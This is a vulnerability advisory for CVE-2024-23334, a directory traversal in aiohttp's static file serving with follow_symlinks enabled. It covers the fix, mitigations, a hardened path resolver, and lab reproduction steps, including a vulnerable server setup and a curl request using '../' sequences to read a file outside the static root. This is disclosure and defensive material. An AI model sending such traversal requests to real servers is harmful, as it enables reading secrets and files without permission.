# CVE-2024-23334

## Summary

aiohttp static file serving with follow_symlinks=True allows directory traversal and arbitrary file read outside the configured static root.

## Description

Improper validation of static file paths in aiohttp’s `web.static()` handler allows directory traversal when `follow_symlinks=True`, enabling attackers to read arbitrary files outside the static root. The issue is fixed in aiohttp 3.9.2.

## Affected Package
- **Name:** aiohttp
- **Ecosystem:** pip (Python)
- **Vulnerable versions:** >= 1.0.5, < 3.9.2
- **Patched version:** 3.9.2

## Details
When aiohttp is used as a web server and a static route is configured with `follow_symlinks=True`, the implementation does not validate that the resolved path stays within the static root directory. As a result, path traversal sequences (e.g., `../`) can escape the static root and read arbitrary files on the server filesystem. The issue occurs even when no symlinks are present. This is a CWE-22 (path traversal) vulnerability.

Upgrading to aiohttp 3.9.2 fixes the issue. Mitigations recommended by the maintainers include disabling `follow_symlinks` and serving static assets from a reverse proxy (e.g., nginx) rather than from aiohttp in production.
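The missing check beside its hardened form, as an added example that is not aiohttp's code: the pre-3.9.2 shape is reconstructed as an assumption, the fixture with its file names and in-root symlink is constructed, and the symlink cases go beyond the traversal the advisory describes to show what `follow_symlinks` is meant to permit.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional


def vulnerable_resolve(root: Path, requested: str, follow_symlinks: bool) -> Path:
    """Reconstructed pre-3.9.2 shape (assumption, not verbatim): check skipped when following symlinks."""
    root = root.resolve()
    filepath = root.joinpath(requested.lstrip("/")).resolve()
    if not follow_symlinks:
        filepath.relative_to(root)  # raises ValueError if the path left the root
    return filepath  # follow_symlinks=True: "../" walks out of root unchecked


def resolve_within_root(root: Path, requested: str, follow_symlinks: bool = False) -> Optional[Path]:
    """Hardened form: containment is checked in both modes. Without follow_symlinks the
    real (symlink-resolved) path must sit under root; with it, the lexical path (".."
    collapsed) must sit under root before symlinks are resolved, so "../" cannot escape."""
    root = root.resolve()
    candidate = root.joinpath(requested.lstrip("/"))
    try:
        if follow_symlinks:
            lexical = Path(os.path.normpath(candidate))
            lexical.relative_to(root)
            return lexical.resolve()
        real = candidate.resolve()
        real.relative_to(root)
        return real
    except ValueError:  # relative_to() failed: the path escapes the root
        return None


def demo() -> dict:
    """Constructed fixture: static root, probe file outside it, in-root symlink to the probe."""
    base = Path(tempfile.mkdtemp())
    root = base / "static"
    root.mkdir()
    (root / "index.html").write_text("ok")
    outside = base / "probe.txt"
    outside.write_text("constructed probe file outside the static root")
    (root / "link.txt").symlink_to(outside)
    return {
        "plain_file_served": resolve_within_root(root, "index.html") == (root / "index.html").resolve(),
        "vulnerable_leaks_probe": vulnerable_resolve(root, "../probe.txt", True) == outside.resolve(),
        "traversal_blocked_strict": resolve_within_root(root, "../probe.txt", False) is None,
        "traversal_blocked_follow": resolve_within_root(root, "../probe.txt", True) is None,
        "symlink_blocked_strict": resolve_within_root(root, "link.txt", False) is None,
        "symlink_allowed_follow": resolve_within_root(root, "link.txt", True) == outside.resolve(),
    }
```

Every entry returned by `demo()` is `True`: the reconstructed vulnerable shape hands back the probe file, while the hardened resolver rejects the traversal in both modes and only permits the in-root symlink when following symlinks is explicitly enabled.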

## Reproduction Steps
> **Note:** Use only in a lab environment. The steps below read a non-sensitive test file.

### Environment setup
1. Install a vulnerable version:
   ```bash
   python3 -m venv venv
   source venv/bin/activate
   pip install aiohttp==3.9.1
   ```
2. Create a minimal aiohttp server with a static route:
   ```python
   # save as server.py
   from aiohttp import web
   import os

   app = web.Application()
   os.makedirs("static", exist_ok=True)
   with open("static/index.html", "w") as f:
       f.write("ok")

   # Vulnerable configuration: follow_symlinks=True
   app.router.add_routes([
       web.static("/static", "static/", follow_symlinks=True),
   ])

   web.run_app(app, host="127.0.0.1", port=8080)
   ```
3. Create a probe file **outside** the static root:
   ```bash
   echo 'POC-AIOHTTP-VULN-TEST' > /tmp/poc-aiohttp-test.txt
   ```
4. Start the server:
   ```bash
   python3 server.py
   ```

### Trigger
5. Request the probe file using path traversal:
   ```bash
   # --path-as-is stops curl from collapsing the ../ segments client-side;
   # without it the request reaching the server no longer contains the traversal
   curl -v --path-as-is "http://127.0.0.1:8080/static/../../../../tmp/poc-aiohttp-test.txt"
   ```

### Expected vs vulnerable behavior
- **Expected (secure):** Server should reject traversal and return 404/403.
- **Vulnerable:** Server responds with the contents of `/tmp/poc-aiohttp-test.txt`.

## Indicators of Success
- The HTTP response body contains `POC-AIOHTTP-VULN-TEST`, proving a file outside the static root was read.

## References
- https://nvd.nist.gov/vuln/detail/CVE-2024-23334
- https://github.com/advisories/GHSA-5h86-8mv2-jq9f
- https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b
- https://github.com/aio-libs/aiohttp/pull/8079
- https://www.exploit-db.com/exploits/52474
- https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC
- https://github.com/brian-edgar-re/poc-cve-2024-23334

## Metadata

- Product: pip:aiohttp
- Severity: high
- Status: open
